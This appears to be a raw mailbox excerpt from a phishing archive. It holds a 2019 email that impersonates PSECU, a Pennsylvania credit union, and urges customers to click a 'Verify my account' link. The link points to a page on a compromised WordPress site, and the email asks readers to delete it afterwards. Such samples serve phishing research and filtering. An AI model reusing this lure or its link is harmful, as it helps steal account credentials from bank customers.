From: "PSECU" <psecu@email.psecu.com>
Date: Mon, 28 Oct 2019 01:02:36 -0400
Message-Id: <20191028050238.4FFAE6C4076@smtp1.caltech.edu>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 208

You will not see this in a MIME-aware mail reader.
--===============0850095563==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Dear Customer,
 Pennsylvania State Employees Credit Union is carrying out a fraud preventi=
on exercise on all accounts
 to reduce and prevent fraud on our online system. All verified account wil=
l recieve a special anti-fraud protection. Which will reduce all risk of on=
line fraud =

 =

Please click on Verify my account to continue update.
Your account information to the verification process
 WE recommend you to deleted this latter after you verify
 Yours Sincerely
Head of Customer Communications
  =

 =20

--===============0850095563==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><P><FONT face=3DCambria>Dear Customer,</FONT></P>
<P><FONT face=3DCambria><FONT face=3DCambria><FONT face=3DCambria>Pennsylva=
nia State Employees Credit Union</FONT></FONT> is carrying out a fraud prev=
ention exercise on all accounts</FONT></P>
<P><FONT face=3DCambria>to reduce and prevent fraud on our online system. A=
ll verified account will recieve a special anti-fraud protection. Which wil=
l reduce all risk of online fraud </FONT></P>
<P><BR><FONT face=3DCambria>Please click on <U><A href=3D"http://polturkmam=
a.pl/wordpress/wp-content/plugins/color/PSECU.asp.html"><FONT color=3D#0080=
c0>Verify my account</FONT></A></U> to continue update.<BR>Your account inf=
ormation to the verification process</FONT></P>
<P><FONT face=3DCambria>WE recommend you to deleted this latter after you v=
erify</FONT></P>
<P><FONT face=3DCambria>Yours Sincerely<BR>Head of Customer Communications<=
/FONT></P>
<P><FONT face=3DCambria></FONT>&nbsp;</P>
<P><FONT face=3DCambria></FONT>&nbsp;</P></html>
--===============0850095563==--

From jose@monkey.org Mon Oct 28 09:04:11 2019 +0000
Return-Path: MAILER-DAEMON
Delivered-To: jose@monkey.org
X-FDA: 76092606702.13.pet50_419771cf81e60
X-Spam-Summary: 10,1,0,909a8ade12d8b8c0,d41d8cd98f00b204,upgrade@monkey.org,:,RULES_HIT:2:41:46:72:150:153:355:375:379:495:800:962:965:966:967:973:978:983:988:989:1189:1208:1224:1260:1311:1313:1314:1345:1381:1431:1433:1434:1436:1437:1513:1515:1516:1517:1521:1535:1561:1571:1588:1589:1593:1594:1606:1685:1714:1719:1730:1747:1777:1792:2084:2194:2196:2198:2199:2200:2201:2393:2525:2527:2560:2563:2682:2685:2771:2828:2859:2893:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3586:3867:3868:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4117:4321:4385:4390:4395:4805:5007:6300:6630:6650:6671:6678:6703:7688:7903:8511:8518:8583:8603:8957:9025:9040:9344:9468:9908:10004:10346:11473:11638:11639:11657:11658:11914:11984:12043:12295:12297:12438:12555:12660:12740:12895:12903:12955:12958:12967:12986:13007:13139:13255:13439:13546:14096:21080:21433:21436:21451:21483:21524:21627:21810:21819:21939:21965:30022:30054:30070,0,RBL:155.94.160.90:@mx.monkey.org.cust.b.hostedemail.com:
X-HE-Tag: pet50_419771cf81e60
X-Filterd-Recvd-Size: 6731
Received: from mx.monkey.org.cust.b.hostedemail.com (unknown [155.94.160.90])
	by imf28.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 28 Oct 2019 09:04:10 +0000 (UTC)
